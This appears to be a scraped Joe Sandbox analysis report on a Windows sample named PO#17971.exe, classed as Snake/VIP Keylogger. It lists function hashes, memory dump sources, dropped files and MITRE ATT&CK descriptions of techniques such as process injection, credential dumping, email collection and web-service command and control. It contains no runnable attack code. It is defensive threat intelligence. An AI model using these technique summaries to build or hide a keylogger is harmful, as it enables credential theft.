Opcode Fuzzy Hash: 4c8cd564c21e41a2479e2f43a73cc43bac850f14f7c2a156a289ef5a0730d7b8
Instruction Fuzzy Hash: C221D3725046049FEF85DF24D9C1B26BB69FF85314F20C569D8094B256C37AD84ACAB1

Function 06429B80 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08c37669d0c0babe52bec2dcd085d303ec684db4310c1f33a6a5f7046125da40
Instruction ID: b76238a76e08c653fa49d701159e1442be2c4c52ed96fdc3b914f305daa6dea2
Opcode Fuzzy Hash: 08c37669d0c0babe52bec2dcd085d303ec684db4310c1f33a6a5f7046125da40
Instruction Fuzzy Hash: 9B217E70A0022AEFEB15DFA2DA44AAEBBF6FF44700F60412AE501A7350DB75D941CB90

Function 0642FD01 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc58b4a2d1d80e3f0a645ef1669c85ef917c57732ed76d5a9f79c9cfc6f5e868
Instruction ID: 13280e88e36ed9cd3f24a1fc50a2e46cb62c9c1b8e0543b62ca051a5d3229d4a
Opcode Fuzzy Hash: cc58b4a2d1d80e3f0a645ef1669c85ef917c57732ed76d5a9f79c9cfc6f5e868
Instruction Fuzzy Hash: CA218070D402099FCB45DFB8D951B9EBFF6FB45304F5086AAD10997266DB784A0ACB80

Function 0642FD10 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a7c0edcc630273186e63c5bc53d3e7d3982482905ad8895c89b11642548e302
Instruction ID: a2086e73b25ba7e9d1242c4ed9b4c0e6d766d0bb90bfef05ed07d870792e8632
Opcode Fuzzy Hash: 3a7c0edcc630273186e63c5bc53d3e7d3982482905ad8895c89b11642548e302
Instruction Fuzzy Hash: 72214F70D402099FCB45DFB8D951B9EBBF6EB44300F50D669D10997255DB785A0ACB80

Function 0068D397 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4511897619.000000000068D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0068D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_68d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a5a78ea765fa399f5a894c122d9ac1cbfc2ffb1d1ded0e6f672c053468af19
Instruction ID: c785202c3d65bc4a8b1935bdf3c5c695741bf1f631af0701b145b9f454410c71
Opcode Fuzzy Hash: c3a5a78ea765fa399f5a894c122d9ac1cbfc2ffb1d1ded0e6f672c053468af19
Instruction Fuzzy Hash: 6121D2B6404240DFCB06DF10D9C4B56BFB2FB84310F24C6A9D9440B656C336D81ACBA2

Function 06422D02 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c20656ad36e28be0d09c7c21083a9cfd3833bab9783f12e5023a29b5181541d
Instruction ID: 02668bbc7aaccae67ba15124853074aa1107fcaaac03d190cbf19cd93368a8b4
Opcode Fuzzy Hash: 5c20656ad36e28be0d09c7c21083a9cfd3833bab9783f12e5023a29b5181541d
Instruction Fuzzy Hash: A921E2B0D1520A9FCB41DFB9C9855EEBFF2BF09300F10526AD909B6255EB305A85CFA1

Function 06429B70 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d4e045f7d2426175d47d903cc070eaa732e448499894fd11123e47d0db5f99d
Instruction ID: 20ee15e9d9ba49ede19032a7e7d059b29544d24e16aca4281344b651e4748cc4
Opcode Fuzzy Hash: 7d4e045f7d2426175d47d903cc070eaa732e448499894fd11123e47d0db5f99d
Instruction Fuzzy Hash: A4118270E00269EFEB19DF62EA54B9E7BB6BF44700F60412AE501BB394DB759842CB50

Function 0639D113 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512035577.000000000639D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0639D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_639d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c5635bf6bf0a90c65c6f78b78781ef727195c12e75a23b42f627594c6f222ba
Instruction ID: 888f45ab9fde40d2ff4ea842f9481ebbf6bc02905e86aef4c9bb4824aead6a5d
Opcode Fuzzy Hash: 2c5635bf6bf0a90c65c6f78b78781ef727195c12e75a23b42f627594c6f222ba
Instruction Fuzzy Hash: 3611BB76904680CFDB46CF24D9C4B15BBA1FB85314F24C6AAD8494B256C33AD44ACFA2

Function 064263A7 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d37e8a0e8c7ded8c2503c9611336d4e4a99259a9b015e475e911637628958b56
Instruction ID: 9e0bb45ec41e89e6a7bf0a36b44119822a7fa814e30bb323629d5d0afda6a171
Opcode Fuzzy Hash: d37e8a0e8c7ded8c2503c9611336d4e4a99259a9b015e475e911637628958b56
Instruction Fuzzy Hash: 0F01F9327001296FCF85EE69D800A9FBB9BEFC8750F15812AF505CB281CA75C912C7B4

Function 0642EE40 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4db86d1dfc97959c1e39fbaaf792c55f450bde79fdb9f2a1b53d5b67ca8335a
Instruction ID: 98e53c94054e636a12bdba030139b87aa3520329bb3a57c2c3e213cbe97bf92c
Opcode Fuzzy Hash: d4db86d1dfc97959c1e39fbaaf792c55f450bde79fdb9f2a1b53d5b67ca8335a
Instruction Fuzzy Hash: 17110574D04209EFCB01CFE8D8419AEBBB2FF49304F108166E914A7361D7345A26CFA1

Function 0068D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4511897619.000000000068D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0068D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_68d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 796e828f8d95db7ba2dc5d1ee9e7312048d2dd890b03d8f2f9fb4b8ebc598293
Instruction ID: 658403847ef49bb49e892bb0346a44a6018db315aad03e390ef14de3e740ab0a
Opcode Fuzzy Hash: 796e828f8d95db7ba2dc5d1ee9e7312048d2dd890b03d8f2f9fb4b8ebc598293
Instruction Fuzzy Hash: B1012B710043049AE720AE15CD84BA7BF9DEF45324F18C62AED480B3C6C2799C46CBB1

Function 0068D006 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4511897619.000000000068D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0068D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_68d000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35b1138ff9fd9047253817829b83607c7599ef72b91bee41ea1a3c50e89271aa
Instruction ID: 87565cafb734843d18e84fc70e4b196ad91df3138ab987b4724b3eedf4eea484
Opcode Fuzzy Hash: 35b1138ff9fd9047253817829b83607c7599ef72b91bee41ea1a3c50e89271aa
Instruction Fuzzy Hash: E5015E7144E3C09ED7128B258C94B92BFB4EF53224F1981DBD9888F2D7C2695848C772

Function 06422DB8 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66ac09b28234fea2e363087464df68606b51285873c313c22e8b92be30320929
Instruction ID: ac3f9ee9744a0dc370ed286b202dfd433fed50c1a3ff548acae5be8fe7371fd0
Opcode Fuzzy Hash: 66ac09b28234fea2e363087464df68606b51285873c313c22e8b92be30320929
Instruction Fuzzy Hash: 5CE0D832D103565BD7019760AC015DEBB35EFA2315F018552D5147B181FB65191983E2

Function 06422DC8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7435b2b4e5ccd4413ea531d22938bf2f4a0e6877d632c3841041b35bd5a9b864
Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
Opcode Fuzzy Hash: 7435b2b4e5ccd4413ea531d22938bf2f4a0e6877d632c3841041b35bd5a9b864
Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1

Function 06429410 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 3b84d5ef80170959b4d9a7b6e4946ab6a6cae1322221001aa7059a4dc7410eb3
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 04C01233A0C1382AA269108FBC40AA3AA8CD2C52B5E710137F52C8320098429C8101E4

Function 0642B4BD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bb9418d51d88b6f7fd9bdfff0d93a999c7abab6ed1cf64fd3bbe0eb73075d7a
Instruction ID: 0d183d781df6a10b863b0377b1546ae7ec5cd217b330315dde6ef6519d5a4dfc
Opcode Fuzzy Hash: 6bb9418d51d88b6f7fd9bdfff0d93a999c7abab6ed1cf64fd3bbe0eb73075d7a
Instruction Fuzzy Hash: 99D0673AB41018AFCB049F98E8408DDBBB6FB9C221B059116EA15A3261C6319921DB60

Function 06426C58 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5cdaac453f835b0cd9cedfcb7d9f6a28ec5d5822cffd555d40ad246863bf439
Instruction ID: dc147f9283a2aa102a979724b1cada220c8d3d6401fbd56edcccb234282e5387
Opcode Fuzzy Hash: e5cdaac453f835b0cd9cedfcb7d9f6a28ec5d5822cffd555d40ad246863bf439
Instruction Fuzzy Hash: 46C012301442095EC64DFB75FA46955372FAE806047505724A10A0A25AEFBC594A86AA

Non-executed Functions

Function 08E56900 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 08E57186
GetCurrentThread.KERNEL32 ref: 08E571C3
GetCurrentProcess.KERNEL32 ref: 08E57200
GetCurrentThreadId.KERNEL32 ref: 08E57259

Strings

Tx?$, xrefs: 08E57124

Memory Dump Source

Source File: 00000010.00000002.4526522552.0000000008E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8e50000_vbc.jbxd

Similarity

API ID: Current$ProcessThread
String ID: Tx?$
API String ID: 2063062207-1528082668
Opcode ID: 08c3cc9f29efd70fc7e74c7facef621808d12ba5b2b23479acbf505e7889d5c2
Instruction ID: 74eecf41443d00dea7ce7a414a0b50694b3f2e02065b3ef14e6f43d8f9bbfdcf
Opcode Fuzzy Hash: 08c3cc9f29efd70fc7e74c7facef621808d12ba5b2b23479acbf505e7889d5c2
Instruction Fuzzy Hash: D65145B09007098FDB04DFA9D948BAEBBF5EF88315F20845DE419A7251DB389984CB65

Function 08E57100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 131threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 08E57186
GetCurrentThread.KERNEL32 ref: 08E571C3
GetCurrentProcess.KERNEL32 ref: 08E57200
GetCurrentThreadId.KERNEL32 ref: 08E57259

Strings

Tx?$, xrefs: 08E57124

Memory Dump Source

Source File: 00000010.00000002.4526522552.0000000008E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_8e50000_vbc.jbxd

Similarity

API ID: Current$ProcessThread
String ID: Tx?$
API String ID: 2063062207-1528082668
Opcode ID: 6065e89fb459c2025cc858dbe97890482d953462456f876d061ff44e26008bde
Instruction ID: 90b575a3cecfcaebb117d6b2b72ac7b7a31f88c5d8762285bd3fd7192ccee8e7
Opcode Fuzzy Hash: 6065e89fb459c2025cc858dbe97890482d953462456f876d061ff44e26008bde
Instruction Fuzzy Hash: C85156B09007498FDB04DFA9D948BAEBBF1EF88314F20805DE419A7361DB789984CF65

Function 06426E28 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;]q, xrefs: 06426E5A
\;]q, xrefs: 06426E3E
\;]q, xrefs: 06426E66
\;]q, xrefs: 06426E34

Memory Dump Source

Source File: 00000010.00000002.4512499727.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6420000_vbc.jbxd

Similarity

API ID:
String ID: \;]q$\;]q$\;]q$\;]q
API String ID: 0-2351511683
Opcode ID: dcc56c9fffe417098b1f8f094c1f96073426963049e0e155749fb461102a26ea
Instruction ID: 29d20f49253c2d2f4f32fb8effd8d2a9387c1d5855ad2bae5833ad645c432a3d
Opcode Fuzzy Hash: dcc56c9fffe417098b1f8f094c1f96073426963049e0e155749fb461102a26ea
Instruction Fuzzy Hash: FA01DF31B101268FD7A59E2CC88092673EAAF88A60376456BE401CB374DA30DC42C784

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO#17971.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO#17971.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TZRtlifudvO.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dnpdxoo.n4e.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ago4tu5k.as2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fuxjkitp.1o0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onhtrnd4.ova.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psszs03j.hnm.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rhmyp1su.2l5.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_teh4qfah.cdj.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmtmstaw.jte.ps1

Windows Analysis Report
PO#17971.exe

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

